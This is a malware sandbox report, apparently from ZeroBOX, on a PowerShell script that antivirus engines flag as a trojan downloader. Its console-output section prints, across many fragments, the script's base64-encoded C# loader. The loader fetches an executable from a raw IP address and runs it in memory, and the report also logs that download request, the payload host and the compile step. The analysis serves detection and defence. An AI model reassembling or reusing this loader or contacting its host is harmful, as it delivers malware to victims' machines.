popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

test.ps1

Generic Malware Antivirus .NET DLL PE File DLL PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us April 30, 2025, 1:32 p.m. April 30, 2025, 1:38 p.m.
Size 2.2KB
Type ASCII text, with very long lines, with no line terminators
MD5 56db20e6f6956d96b0ba07b78e04bb32
SHA256 c93a513004c750f9bdbb508acb2395d2f165350e9c0b6c83ea551f5b3d142e84
CRC32 E6792C02
ssdeep 48:tmqv8p785ijQF3gNZE+KbyNHF0NkMKzweub:t6Wim4/lN+NjiWb
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
176.65.144.23 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "QFjmoLmehmGsnFsBWjxlvkipT" with "0" argument(s): "Could not
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: load file or assembly '11776 bytes loaded from mscorlib, Version=2.0.0.0, Cultu
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: re=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. An att
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: empt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\test.ps1:1 char:2259
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + $whatever = "dXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5JTzt1c2luZyBTeXN0ZW0uTmV0O3Vz
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: aW5nIFN5c3RlbS5SZWZsZWN0aW9uO3VzaW5nIFN5c3RlbS5UaHJlYWRpbmc7bmFtZXNwYWNlIEVtZ0l
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: QdFJqeU8uVkNmWktwU3FjTwp7cHVibGljIGNsYXNzIFFCaWN4bkNyTWVNVWdFcHBrTWRSSEpKdVcKe3
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ByaXZhdGUgY29uc3Qgc3RyaW5nIFNJYm5LcFRBTkt4QkxjZGNzQnZxTldzWVM9Imh0dHA6Ly8xNzYuN
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: jUuMTQ0LjIzL2ZmL0NPTlZFUlRFUi5leGUiO3ByaXZhdGUgTWVtb3J5U3RyZWFtIElpV2hwWWVHS0pH
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: YW9OYWFKYVJ5SWJ4T1U9bmV3IE1lbW9yeVN0cmVhbSgpO1tTVEFUaHJlYWRdCnB1YmxpYyB2b2lkIFF
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: Gam1vTG1laG1Hc25Gc0JXanhsdmtpcFQoKQp7U2l0clNmWHRTQkd5TEZ4bkxHenR5ZFBzZSgpO25Fbl
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: NjcFRnZ0d5RHRURUhtQ0xIZFBhZ0koKTt9CnByaXZhdGUgdm9pZCBuRW5TY3BUZ2dHeUR0VEVIbUNMS
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: GRQYWdJKCkKe2J5dGVbXWJ1ZmZlcj1JaVdocFllR0tKR2FvTmFhSmFSeUlieE9VLlRvQXJyYXkoKTtB
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: c3NlbWJseSBhc3NlbWJseT1udWxsO2lmKEVudmlyb25tZW50LlZlcnNpb24uTWFqb3I+PTQpCntNZXR
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: ob2RJbmZvIG1ldGhvZD1UeXBlLkdldFR5cGUoIlN5c3RlbS5SZWZsZWN0aW9uLlJ1bnRpbWVBc3NlbW
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: JseSIpLkdldE1ldGhvZCgibkxvYWRJbWFnZSIsQmluZGluZ0ZsYWdzLk5vblB1YmxpY3xCaW5kaW5nR
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: mxhZ3MuU3RhdGljKTthc3NlbWJseT0oQXNzZW1ibHkpbWV0aG9kLkludm9rZShudWxsLG5ldyBvYmpl
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Y3RbXXtidWZmZXIsbnVsbCxudWxsLG51bGwsZmFsc2UsZmFsc2UsbnVsbH0pO31lbHNlCntNZXRob2R
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: JbmZvIG1ldGhvZD1UeXBlLkdldFR5cGUoIlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IikuR2V0TW
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: V0aG9kKCJuTG9hZEltYWdlIixCaW5kaW5nRmxhZ3MuTm9uUHVibGljfEJpbmRpbmdGbGFncy5TdGF0a
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: WMpO2Fzc2VtYmx5PShBc3NlbWJseSltZXRob2QuSW52b2tlKG51bGwsbmV3IG9iamVjdFtde2J1ZmZl
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: cixudWxsLG51bGwsbnVsbCxmYWxzZX0pO30Kb2JqZWN0W11hcmdzPW5ldyBvYmplY3RbMV07aWYoYXN
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: zZW1ibHkuRW50cnlQb2ludC5HZXRQYXJhbWV0ZXJzKCkuTGVuZ3RoPT0wKQphcmdzPW51bGw7YXNzZW
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: 1ibHkuRW50cnlQb2ludC5JbnZva2UobnVsbCxhcmdzKTt9CnByaXZhdGUgdm9pZCBTaXRyU2ZYdFNCR
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: 3lMRnhuTEd6dHlkUHNlKCkKe1dlYlJlcXVlc3QgcmVxdWVzdD1XZWJSZXF1ZXN0LkNyZWF0ZShTSWJu
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: S3BUQU5LeEJMY2Rjc0J2cU5Xc1lTKTtXZWJSZXNwb25zZSByZXNwb25zZT1yZXF1ZXN0LkdldFJlc3B
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: vbnNlKCk7dXNpbmcoU3RyZWFtIHdlYl9zdHJlYW09cmVzcG9uc2UuR2V0UmVzcG9uc2VTdHJlYW0oKS
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: kKe2J5dGVbXWJ1ZmZlcj1uZXcgYnl0ZVs4MTkyXTtpbnQgcmVhZD0wO3doaWxlKChyZWFkPXdlYl9zd
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: HJlYW0uUmVhZChidWZmZXIsMCxidWZmZXIuTGVuZ3RoKSk+MCkKe0lpV2hwWWVHS0pHYW9OYWFKYVJ5
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: SWJ4T1UuV3JpdGUoYnVmZmVyLDAscmVhZCk7fX0KcmVzcG9uc2UuQ2xvc2UoKTt9fX0=";$dec = [T
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: ext.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));Add-Type
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: -TypeDefinition $dec;$instance = New-Object EmgIPtRjyO.VCfZKpSqcO.QBicxnCrMeMUg
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: EppkMdRHJJuW;$instance.QFjmoLmehmGsnFsBWjxlvkipT <<<< ();
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000001c7
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04e81620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059f128
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0059f128
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bccc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcd00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bcc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.65.144.23/ff/CONVERTER.exe
request GET http://176.65.144.23/ff/CONVERTER.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02569000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05356000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05357000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05358000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02599000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0257a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06480000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x054b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\wfkurm67.dll
file C:\Users\test22\AppData\Local\Temp\wfkurm67.dll
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received PADPADP´´ÎÊムlSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADP´™OÕ_ìBì$RSDSì()ž—D›ÛGȲÀúŒC:\Users\USER\source\repos\CONVERTER\CONVERTER\obj\Debug\CONVERTER.pdbsCC C_CorExeMainmscoree.dllÿ% @ €P€8€€h€¬`4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°|StringFileInfoX000004b0Comments"CompanyName< FileDescriptionCONVERTER0FileVersion1.0.0.0<InternalNameCONVERTER.exeHLegalCopyrightCopyright © 2024*LegalTrademarksDOriginalFilenameCONVERTER.exe4 ProductNameCONVERT
Data received ER4ProductVersion1.0.0.08Assembly Version1.0.0.0¼cê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>@  3
Data sent GET /ff/CONVERTER.exe HTTP/1.1 Host: 176.65.144.23 Connection: Keep-Alive
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline"
host 176.65.144.23
file C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline
Symantec ISB.Heuristic!gen68
ESET-NOD32 a variant of Generik.KSACMRB
Avast PwrSh:Dropper-AG [Drp]
Kaspersky HEUR:Trojan.PowerShell.Agent.gen
DrWeb PowerShell.DownLoader.1598
Google Detected
Antiy-AVL GrayWare[AdWare]/Win32.Puwaders
Microsoft TrojanDownloader:PowerShell/Tnega.PAA!MTB
GData Script.Trojan.Agent.COSQGH
Varist ABApplication.WTW
Ikarus Trojan-Downloader.PowerShell.Agent
huorong TrojanDownloader/PS.NetLoader.eo
AVG PwrSh:Dropper-AG [Drp]
alibabacloud Trojan:Win/Agent.gyf
Time & API Arguments Status Return Repeated

send

 buffer: GET /ff/CONVERTER.exe HTTP/1.1 Host: 176.65.144.23 Connection: Keep-Alive
socket: 1556
sent: 79
1 79 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wfkurm67.cmdline"